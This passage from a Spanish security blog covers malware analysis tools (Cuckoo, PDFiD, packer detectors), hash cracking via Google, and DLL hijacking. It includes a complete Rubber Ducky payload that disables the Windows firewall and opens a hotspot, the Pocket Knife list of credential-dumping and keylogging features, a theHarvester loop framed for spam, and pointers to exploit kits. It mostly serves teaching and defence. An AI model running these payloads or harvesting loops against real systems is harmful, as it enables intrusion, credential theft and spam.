Si queremos ver un report en concreto, clicamos sobre el MD5 que queramos ver y podemos ver un resumen del binario analizado.

El report está detallado, en conexiones de red, características del binario etc… Además te realiza pantallazos para que puedas ver que ocurre.
Cuckoo también es capaz de analizar URL, para ello debemos de pasarle lo siguiente:

python submit.py -u URL_MALICIOSA -p ie

Con esto, Cuckoo abrirá esta URL con Internet Explorer y por ejemplo capturará si se baja algún binario o se crean archivos adicionales.
Como véis Cuckoo ofrece bastante versatilidad como herramienta de análisis de malware.

Gcrack descifrando hashes con Google

En los procesos de auditoría, cuando se consigue acceso a una máquina, con Meterpreter es posible por ejemplo hacer un volcado de los hashes de la máquina. Aunque se consiga hacer el volcado es importante el poder obtener la contraseña en claro. Como “no somos tan diferentes” seguro que el hash de la contraseña ya está en Internet 
Así que Grack se encargará de hacer esa búsqueda del hash.
Como dependencias usaremos python-lxml y python-nltk. Hacemos la prueba de búsqueda de hashes de contraseñas.
Primero de todo nos bajamos Grack para usarlo:

git clone https://github.com/tkisason/gcrack.git

Ejecutamos Grack para buscar los hashes en Google

*****@*******:~/tools/brute_force/gcrack:python gcrack.py hashes
[+] Hashes loaded, using google_attack to crack them
md5(qwerty) d8578edf8458ce06fbc5bb76a58c5ca4
md5(password) 5f4dcc3b5aa765d61d8327deb882cf99
md5(alkali) f7f41ad5328d528a751c55fa2fcf7273
md5(password09) 8350513a8aff1d5bc1534dbd90747bb8
sha1(123456) 7c4a8d09ca3762af61e59520943dc26494f8941b
sha1(security) 8eec7bc461808e0b8a28783d0bec1a3a22eb0821
md5(admin) 21232f297a57a5a743894a0e4a801fc3
sha1(crypto) 44a9713350e53858f058463d4bf7f1e542d9ca4b
[+] Found 8 of 8

Como podés ver la herramienta ha sido capaz de encontrar los hashes en Google

USB hacking

El acceso físico a una máquina siempre puede suponer un problema de seguridad. No por el robo del equipo sino porque alguien de manera intencionada podría por ejemplo conectando un USB instalar un malware, o aprovechandose de una vulnerabilidad 0day del sistema operativo ejecutar código remoto y tener una shell  con permisos de administrador.
El artículo de hoy no trata sobre la explotación de una vulnrabilidad, sino de proyectos que tratan sobre “USB hacking”.
No creáis que estos USB son grandes.. y que se verán en seguida, los dispositivos que se usan para estas cosas son pequeños, y incluso tienen soporte para SD.

USB Rubber Ducky

Como veis el dispositivo es bastante pequeño y además tiene soporte para tarjeta SD.
¿Que proyectos existen?
El mas novedoso hasta la fecha es el de Rubber Ducky, podéis encontrar información sobre él en Code Google
El proyecto posee las siguientes características:

• Firmware to Support Windows, Linux, Mac OS X, Android & IOS
• Firmware to Support OSX only! (by demand)
• Firmware to Support Mass Storage (acts like USB Drive)
• Firmware to Support Multiple Payloads in HID mode
• New Firmware Composite Device; Mass Storage & Keyboard (Button triggers Keyboard) Language Independent
• New Feature Version 2 firmware supports easy VID & PID manipulation through binary file vidpid.bin.

Operating Systems Supported:

• Windows
• Unix (Linux,Solaris,BSD)
• OSX
• Android
• IOS

Multiple HID Language Support

• US (United States)
• UK (United Kingdom)
• DE (German)
• DA (Danish)
• FR (French)
• BE (Belgian)
• NO (Norwegian)
• PT (Portuguese)
• SV (Swedish)
• RU (Russian) (testing)

Script(s) to reverse Hak5 Ducky Binaries (inject.bin files) into their ducky script form.

• Currently Supports En-US and En-GB Languages

Además podremos crear distintos Payloads según nuestras necesidades. Tendremos una página que nos genera alguno de ellos.

Payloads Rubber Ducky

Para ver un ejemplo en Windows 7:

REM Author: Darren Kitchen
REM Target: Windows 7
REM Description: Create a Wireless AP and disable firewall.
DELAY 2000
CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
DELAY 100
LEFTARROW
ENTER
DELAY 200
STRING netsh wlan set hostednetwork mode=allow ssid=Seifreed key=CLAVE
ENTER
DELAY 100
STRING netsh wlan start hostednetwork
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
STRING exit
ENTER

En este caso el usuario se conectaría al punto de acceso y el firewall quedaría deshabilitado.

QUACK

Puedes colaborar con tu propio PAYLOAD si quieres
Otro de los proyectos interesantes de USB Hacking es USB Pocket Knife
El proyecto es muy ambicioso y tiene muy buenas características, el detalle:

Key:
- Non-U3 Drives Only
- U3 Drives only
- Not yet Implemented
- Everything Else
Features:
- Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive.
- Full silent autorun with no user interaction for U3 drives.
- A “Menu.bat” is included to mange all special functions, modules, and features of the switchblade.
- Payload checks the root of the C: drive and prevents the payload from running if the file “Safety.txt” is found.
- Includes TightVNC viewer so you always have it with you.
- Includes Notepad++ for easy batch editing.
- Includes antidote batch files for Nmap, the Hacksaw, and VNC.
- Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs.
- A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it’s been nuked by an antivirus.
- A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *working on a way to get this working for U3 drives.
- Auto Compress logs as they are generated to save space
- Email logs Back to yourself
- Optional auto-repack of executable to circumvent AV detection
Payload Components:
- Runs AVKill (csrss.exe)
- Restores the payload to the last backup point
- Disables the Windows Firewall Silently
- Hides Hidden and System Files
- Enables the Remote Desktop service
- Dumps general System Info
- Dumps the SAM
- Dumps LSA secrets
- Dumps LSA secrets via an alternate method (less detectable, not as pretty)
- Dumps Network Passwords
- Dump messenger passwords
- Dump IE passwords.
- Dump saved wireless keys
- Dump URL history
- Dump Firefox passwords (Supports Firefox 3))
- Dump Cache Passwords
- Dump Current Network Services
- Generic Port Scanning
- Dumps current external IP
- Dumps email, messenger, and general website passwords
- Dumps currently installed hot fixes and IE history
- Dumps Google Chrome passwords
- Installs Hacksaw the usual way
- Installs WinVNC client.
- Installs Nmap as a service (emails you results like the Hacksaw)
- Installs a keylogger which emails its logs off to you daily [Broken!]
- File slurping for logs, chat-logs, downloads, bookmarks, etc. (smaller files)
- File slurping for various Documents and Media folders. (larger files)
- Opens an explorer window to the Documents folder when finished
- Automatic update scrip to keep various executables up to date.
- Compress logs as they are generated to save space.
- Optionally email logs in addition to storing them on the switchblade.
- Management interface to manage the various functions of the pocket Knife.
- Ability to save up to 3 configuration profiles [New!]

El USB hacking no es algo pasado de moda y con una buena suite instalada se pueden hacer estragos

Guia definitiva para el “tracking de navegación”

l tracking de navegación es algo de lo que se está hablando mucho últimamente, diversos investigadores hacen hincapié en la importancia del tracking. Cuando visitas una página web tus datos son enviados a terceros sin que tu lo sepas. Estos fenómenos se llaman remarketing o retargeting. 
Proyectos como Do not track Plus cuando llegas a una página te indican donde se van a enviar esos datos.

Dont track plus

Además hay extensiones que se pueden instalar en el navegador que proporcionar esa privacidad, yo creo necesaria, en la navegación.
El artículo de hoy viene dado ya que hay un proyecto en Internet que explica paso por paso como configurar y que instalar para aumentar privacidad y sobretodo evitar el tema del tracking.
El proyecto podéis encontrarlo en:
http://fixtracking.com/
Seguro que lo encontráis interesante y lo mas importante aumentáis vuestra privacidad en internet.

Extrayendo información a través de UpnP

A raíz de la noticia de Rapid7, me enteraba de una vulnerabilidad reciente descubierta en UpnP.
El fallo en si es bastante grande ya que UpnP es utilizado por más de 1.500 fabricantes y 6.900 productos, entre los que se encuentran dispositivos de Belkin, D-Link, Linksys, Netgear o Apple.
Como no, ya han liberado módulo de Metasploit por lo que podemos automatizar las pruebas en los rangos de red de nuestra organización (si trabajamos en empresa) o simplemente en nuestra red en casa para ver si somos vulnerables.
También podemos probar el fallo con nmap, hay un script para ello.

nmap –script upnp-info.nse -p 1900 -sU 192.168.0.0/24

Vamos a probar con el módulo que han habilitado para Metasploit, lo primero es actualizar y arrancar el framework


Usar el módulo de escaneo es muy fácil, elegimos la opción y lanzamos el módulo.

Indicamos los RHOSTS correspondientes y lanzamos el módulo

En el escaneo realizado con el módulo hemos encontrado una de las Ip’s de la que se ha podido extraer información.
Rapid7 ha habilitado una web para saber si tu red es vulnerable al fallo de UpnP
http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp
Y como no, podéi descargar el Whitepaper de a siguiente dirección:
https://community.rapid7.com/docs/DOC-2150

PDFiD, analizando archivos PDF

Es importante tener un buen arsenal de herramientas si queremos hacer un análisis completo y funcional en un caso. Hoy en día que el malware se hace eco en casi cualquier tipo de archivo es importante poder analizar cada uno de ellos. Hoy le toca el paso a los PDF’s. Ya he publicado alguna cosa aquí sobre análisis de PDF, de echo uno de mis colegas es el desarrollador de PeePDF, GRAN herramienta para el análisis de PDF’s maliciosos.
El único inconveniente de PeePDF es la cantidad de dependencias que tiene, así que si no te quieres liar es mejor que los uses desde distribuciones como Remnux. La ventaja de usar la herramienta que veremos hoy es que no necesitarás ninguna dependencia, eso si, no tiene la potencia de análisis de PeePDF, está claro.
La herramienta la descargamos desde la web de Didier Stevens
http://didierstevens.com/files/software/pdfid_v0_1_0.zip
Primero vamos a ver que opciones tiene la herramienta:

darkmac:Downloads marc$ python pdfid.py -h
Usage: pdfid.py [options] [pdf-file|zip-file|url]
Tool to test a PDF file
Options:
–version show program’s version number and exit
-h, –help show this help message and exit
-s, –scan scan the given directory
-a, –all display all the names
-e, –extra display extra data, like dates
-f, –force force the scan of the file, even without proper %PDF header
-d, –disarm disable JavaScript and auto launch

Para tener una vista clara de lo que hay, nos servirá.
Vamos ha hacer un análisis de un documento PDF, para ver que podemos extraer:

darkmac:Downloads marc$ python pdfid.py /Users/marc/Downloads/RESULTS/analysis/52/APT_1104statment.pdf
PDFiD 0.1.0 /Users/marc/Downloads/RESULTS/analysis/52/APT_1104statment.pdf
PDF Header: %PDF-1.7
obj 59
endobj 59
stream 40
endstream 40
xref 1
trailer 1
startxref 5
/Page 3
/Encrypt 0
/ObjStm 9
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 9
/Colors > 2^24 0

Si comprobamos la salida de PDFiD podemos ver que en concreto este archivo tiene varios objetos emmbedded… Cosa sospechosa a priori…
PDFiD también nos permite extraer la fecha de modificación y creación del documento

darkmac:Downloads marc$ python pdfid.py -e /Users/marc/Downloads/RESULTS/analysis/52/APT_1104statment.pdf
PDFiD 0.1.0 /Users/marc/Downloads/RESULTS/analysis/52/APT_1104statment.pdf
PDF Header: %PDF-1.7
obj 59
endobj 59
stream 40
endstream 40
xref 1
trailer 1
startxref 5
/Page 3
/Encrypt 0
/ObjStm 9
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 9
/Colors > 2^24 0
%%EOF 5
After last %%EOF 0
D:20110413150033+08’00 /CreationDate
D:20110704103118+08’00 /LastModified
D:20110920103827+08’00 /ModDate
D:20110920103842+08’00 /CreationDate
D:20110920103851+08’00 /LastModified
Total entropy: 7.350737 ( 91010 bytes)
Entropy inside streams: 7.694377 ( 52732 bytes)
Entropy outside streams: 6.372867 ( 38278 bytes)

Mas información que podemos extraer de los documentos PDF.
Sin duda una herramienta a incorporar en nuestro arsenal.

Hexinject

El estudio del tráfico de red es necesario en varias disciplinas, por ejemplo en un análisis dinámico de malware. Es por eso que existen herramientas como HexInject.
Esta herramienta aunque a priori pueda parecer que es difícil de usar tiene un par de flags que me han parecido interesantes.
Búsqueda de strings en la captura
Uno de los flags que podremos usar a la hora de capturar el tráfico es el uso de strings,

Hexinject

Podemos buscar directamente por los hosts que aparecen en la muestra:

Hosts

Además de buscar haciendo captura del tráfico seremos capaces de inyectar paquetes en la red. Está claro que al verificar estos paquetes se trata de paquetes incorrectos.

Paquete malformado

La herramienta está incluída en la suite de Backtrack y la podéis encontrar en Sourceforge
http://hexinject.sourceforge.net/

Distribuir el malware con un exploit kit

Cuando se prepara una campaña de infección de malware el criminal se puede encontrar en varios momentos.

• Posee una infraestructura para cometer fraude
• Posee un Exploit Kit que ha comprado
• Tiene la muestra con la configuración.

Se pueden dar los tres casos a la vez lo que facilita que alguien con malas intenciones pueda perpetuar fraude.
Pero en algunos casos es posible que un criminal se encuentre que solo ha pagado por la muestra que usará para infectar a los usuarios y necesite de alguna manera distribuir malware. En esos casos y si no quiere pagar por un Blackhole puede tratar de hacerse un kit a medida o buscar algunos de los que puede encontrar por la red.
Por ejemplo existen algunos foros que se encargan de distribuir Exploits kits, no habrá ninguno actualizado, pero puedes encontrarte con muchas sorpresas si buscas bien.
http://bit.ly/14qvyjZ
En esas entradas podremos encontrar exploits para descargar, esto sirve tanto si queremos distribuirla muestra o simplemente queremos saber como funciona.

Exploit para descargar

Aunque tampoco hemos de fiarnos de lo que nos descargamos ya que hemos de pensar que es posible que la muestra de malware contenga otro malware y quedemos infectados.

Envío gratuíto de SPAM

Cuando se realiza un análisis sobre una investigación utilizamos herramientas que desarrolladores cuelgan en los github y los sourceforge correspondientes. Estas herramientas facilitan el día a día de los técnicos. Pero que pasaría si estas herramientas las usaran los cibercriminales?
Por poner un ejemplo, TheHarvester, esta herramienta se usa para la parte de information gathering. ¿Que podemos hacer con esta herramienta?
darkmac:theharvester-read-only marc$ python theHarvester.py
*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| ‘_ \ / _ \ / /_/ / _` | ‘__\ \ / / _ \/ __| __/ _ \ ‘__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.2a *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
*******************************************************************
Usage: theharvester options
-d: Domain to search or company name
-b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
-s: Start in result number X (default 0)
-v: Verify host name via dns resolution and search for virtual hosts
-f: Save the results into an HTML and XML file
-n: Perform a DNS reverse query on all ranges discovered
-c: Perform a DNS brute force for the domain name
-t: Perform a DNS TLD expansion discovery
-e: Use this DNS server
-l: Limit the number of results to work with(bing goes from 50 to 50 results,
-h: use SHODAN database to query discovered hosts
google 100 to 100, and pgp doesn’t use this option)
Examples:./theharvester.py -d microsoft.com -l 500 -b google
./theharvester.py -d microsoft.com -b pgp
./theharvester.py -d microsoft -l 200 -b linkedin
La herramienta posee varios métodos de búsqueda.
Vamos a ponernos en la piel de un spammer, en la que quiere conseguir direcciones de correo de una compañía a la que quiere mandar spam.
Sería tan sencillo con hacer un bucle y usar harvester para conseguir las direcciones de correo.
Esto que comento será tan fácil como hacer un archivo TXT con tantos dominios como los que queramos escanear.

for i in `cat dominios.txt`; do python theHarvester.py .d $i -b google ; done

Una tarea que pueden automatizar en sus campañas de SPAM.

URLQuery, servicio web para el análisis de malware

A día de hoy es complicado saber si no quedaremos infectados al navegar por Internet. Para infectarnos no hace falta que vayamos ha navegar en aquella página que nos puede venir en un correo de SPAM, si no que ahora una de las prácticas habituales de los ciber-criminales es infectar páginas legítimas.
Y esto, ¿porque ocurre?
Bueno es mas fácil poder llegar a infectar a usuarios que vistan webs legítimas que no intentar obligar al usuario a visitar un link que le llegará por correo ¿No?
Para tratar de analizar estas páginas webs existen páginas que nos facilitarán en poco tiempo un reporte de si hay algo peligroso en dicha página web. Uno de esos servicios es URLQuery.
Si vamos hacia la página web encontraremos los análisis que ha ido realizando la gente:

Nos da bastante información como la fecha, si en el IDS saltó una alerta o no, además de la IP e URL/IP.
Vamos a ver primero un ejemplo de una página de dominio .cat de aquí de Cataluña! Veremos un ejemplo de un report de un escaneo.

Podremos ver un resumen del escaneo, en el resumen vemos

• URL
• ASN
• Localización
• Fecha del report
• Status
• Alertas

Además podremos ver un pantallazo de la página web.
En Settings veremos con que parámetros se ha configurado el escaneo. En este caso podemos ver que versiones específicas han saltado.
También podemos ver la parte de alertas que ha saltado en los motores.
Que mas cosas podemos ver en el reporte de URLQuery

Si URLQuery ha encontrado mas alertas en el mismo DOMINIO/IP/ASN nos lo mostrará, para poder ver relación entre infecciones por ejemplo.
Otra de las cosas interesantes es poder ver los Javascripts que se ejecutan en la página para ver si hay alguno malicioso, por ejemplo.
También podremos ver las transacciones HTTP que hay en la web.

En la última parte del report podemos ver los REQUEST que hace la página y los response recibidos.
Vamos a ver en un ejemplo de infección en la web, que indicadores deberíamos de tener en cuenta.

Una de las alertas en las que nos tenemos que fijar en URLQuery es en los Javascript que carga la página, aquí podremos ver funciones EVAL, por ejemplo.
Esta es una de las cosas que podremos tener en cuenta.
Otra de las cosas que podremos ver es las peticiones que se realizan desde la página al cargarla:

URLQuery además nos marcará la petición en amarillo para que la revisemos.
URLQuery es gratis y permite analizar las URL’s que necesites, por otro lado además tienen el apartado de estadísticas en el que podrás consultar que Exploits Packs son los que mas han analizado. También cuando realices un análisis puedes cambiar la versión de Java y Adobe además del navegador.

Problemas en la detección de packers

Es común encontrarse malware que llevan como medida de  protección un packer, esto dificulta tanto la parte de detección por parte de las casas de antivirus como por parte del analista cuando realiza la ingeniería inversa.

Un Packer es  un programa que toma como entrada un fichero ejecutable y devuelve otro fichero ejecutable con la misma funcionalidad pero con ciertas protecciones añadidas que dificultan su análisis.

En el análisis del binario nos podemos encontrar con ciertas dificultades, una de ellas es que al contener el packer existirán diversas partes del binario que estarán cifradas, esto dificulta el análisis del código de manera que tendremos que extraer el packer para poder ver el contenido del binario. Existen multitud de packers, de los mas famosos podemos encontrar UPX, FSG, Themida etc…

El primer paso para poder ver el contenido del binario es averiguar con que Packer ha sido empaquetado. Es en este paso es donde intervienen ciertos programas que se encargan de analizar la cabecera del binario para tratar de analizar con que Packer esta protegido dicho binario.

Este tipo de programas no son 100% fiables y son capaces de darnos falsos positivos y de esto trata la entrada de hoy. 

PEID

PEID es uno de esos programas capaces de dar información de como está empaquetado, estos software se basan en firmas que pueden buscar en bases de datos que se van actualizando, esas firmas se encuentran a lo largo del binario con el binario en si o bien mirando solo el Entry Point.

Ahora haremos la prueba con un binario

PEID nos indica que el binario está empaquetado con UPolyX. ¿Será esto cierto?

El software se puede configurar para que haga los análisis mas profundo del binario 

 Configuramos PEID de esta forma y volvemos a analizar el binario.

El packer detectado es otro, no el encontrado anteriormente, PEID se basa en firmas para la detección del tipo de packer.

RDG Packer Detector

RDG igual que PEID nos ayuda a identificar el packer con el que se haya empaquetado el binario.

También se basa en firmas igual que PEID, pero en este caso también nos da un resultado distinto.

 

RDG detecta el packer por heurística y nos da un resultado distinto a PEID.

¿Fallo en las comprobaciones automáticas?

Una pregunta que nos podemos hacer es porque PEID y RDG han detectado packers distintos, y en el caso de PEID si se configuraba para que la comprobación se hiciera de manera más profunda detectaba un packer distinto, esto es debido a que este tipo de programas se basan en firmas, si miramos el fichero de firmas

Como las firmas se van actualizando, hay firmas que solo están completadas la mitad de la firma, si buscamos en algunos casos de los packers detectados, como Upolyx, Aspack y Extreme Protector, nos encontramos.

 

Este es el caso de Upolyx, detecta la firma porque parte delos Bytes del packer se encuentran en el binario 

Parte de la firma del packer de Aspack también se encuentra en el binario.

 Y por último el packer detectado por RDG que encontraba Xtreme Protector, también es encontrado en el binario.

Además algunos de los packers permiten poner una firma falsa, de manera que dificulta la detección en base a éstas.

Detección del packer manualmente

Otra de las opciones que disponemos es de analizar el binario manualmente con un debugger, no es tan rápido como usar PEID o RDG pero nos aseguramos de tener mas fiabilidad a la hora de detectar el packer.

Para el análisis usaremos OllyDBG, abrimos OllyDBG y empezamos. 

Cargamos el binario a analizar, nos dirigimos al image base + 1000h bytes (es donde se mapea/empieza el código, para este caso), el packer sustituye al programa colocándose él en esta dirección, es por eso que veremos el contenido cifrado.

En la ejecución del programa en primer lugar se ejecuta el código del packer, que se encargará de descifrar y descomprimir el código previamente protegido.

Colocamos un breakpoint y vamos ejecutando el programa en Olly para ver si podemos ver que packer es.

En la ejecución del sample el Olly podemos ver el string “oreans” ; oreans es la empresa que distribuye software comercial como Themida, es posible que se trate de este software así que seguimos buscando entre los distintos productos que distribuye la compañía, hasta encontrar el software. 

Se trata de WinLicense, uno de los productos que distribuye la empresa Oreans para la protección de binarios, que en este caso ha sido utilizado para proteger malware de la detección de antivirus y de un posible análisis del mismo.

El uso de los packers es muy frecuente cuando se trata de malware, muchos aprovechan packers como por ejemplo UPX, los modifican y los usan para volver sus samples modificados indetectables.

Las mafias profesionales ya usan packers privados que son indetectables por los motores antivirus, además en el mundo Underground ya existen servicios que por unos pocos dólares pueden empaquetar un binario con un packer/cripter privado de manera que será difícil detectarlo por los motores antivirus. 

Windows DLL Hijacking

Durante los últimos días, la avalancha de nuevos advisories que se refieren a esta vulnerabilidad está causando bastante revuelo. Ya hay contabilizadas más de 100 aplicaciones vulnerables y la lista parece que continúa creciendo. ¿Realmente es para tanto? Veamos:

La nota detonante ha sido este documento en el cual se reporta una vulnerabilidad que afecta a la aplicación iTunes. Básicamente el problema consiste en la posibilidad de ejecutar código de forma remota, "invitando" a un usuario a abrir con iTunes un archivo inofensivo, ya sea desde una unidad local, una carpeta compartida o una unidad usb. Este archivo se acompaña de una librería específica requerida por la aplicación vulnerable. Cuando la aplicación procede a la apertura del archivo realiza la carga en memoria de esta librería en lugar de la original. ¿Cómo es esto posible?

La explicación técnica es bastante sencilla. Cuando una aplicación de Windows carga de forma dinámica una librería sin especificar la ruta completa, Windows busca esta librería siguiendo un orden específico. Las funciones encargadas de realizar la carga de la librería son LoadLibrary y LoadLibraryEx. Este es el orden de búsqueda del archivo DLL de estas dos funciones:

1. El directorio desde el que se cargó la aplicación
2. El directorio del sistema
3. El directorio del sistema de 16 bits
4. El directorio de Windows
5. El directorio de trabajo actual
6. Los directorios enumerados en la variable de entorno PATH

Si consultamos la documentación oficial de Microsoft vemos que se recomienda no utilizar la función SearchPath para obtener la ruta completa al archivo DLL al utilizarla posteriormente para llamar a LoadLibrary. Esta recomendación se basa en el hecho de que la función SearchPath usa un orden de búsqueda diferente de los archivos, comenzando por el directorio de trabajo. La forma más sencilla de evitar este problema es llamar previamente a la función SetDllDirectory pasándole como parámetro una ruta en blanco, eliminando así el directorio actual del orden de búsqueda por defecto de los archivos DLL.


Verificando la vulnerabilidad.

Unas pruebas rápidas en un entorno controlado son suficientes para comprobar cómo es bastante fácil encontrar aplicaciones vulnerables y cómo explotar esta vulnerabilidad.
Nuestro conejillo de indias será el archivo GRPCONV.EXE incluido en Windows XP, esta aplicación es el conversor de grupos para el Administrador de programas de Windows.

La siguiente es una captura de pantalla de Windbg (debugger) en la cual se aprecia la carga de la librería imm.dll desde el directorio de trabajo en el cual se abre un archivo grp.



La librería imm.dll original que carga la aplicación, se ha sustituido por otra que en realidad es un exploit a medida, el cual proporciona una shell a otro equipo de pruebas con dirección IP 172.17.1.89.



¿Cual ha sido la respuesta de Microsoft?

La siguiente actualización de seguridad proporciona una nueva entrada del registro de Windows CWDIllegalInDllSearch, que permite a los administradores controlar la ruta de búsqueda de las dlls cargadas por las aplicaciones. Mediante esta nueva entrada es posible definir lo siguiente, ya sea para cada aplicación o para todo el sistema:

- Quitar el directorio de trabajo actual de la ruta de búsqueda de la biblioteca.
- Impedir que una aplicación cargue una biblioteca desde una ubicación de WebDAV.
- Impedir que una aplicación cargue una biblioteca desde un WebDAV o desde una ubicación UNC remota.

Es curioso cómo una vulnerabilidad que fue descubierta por Georgi Guninski en el año 2000, y que en su momento (2001) fue activamente explotada por el gusano Nimbda, vuelve a ponerse de actualidad. Pues sí, me temo que no se trata de algo nuevo. Esta era precisamente una de las técnicas que utilizaba Nimbda para propagarse mediante la copia de la supuesta librería riched20.dll en directorios con archivos .doc.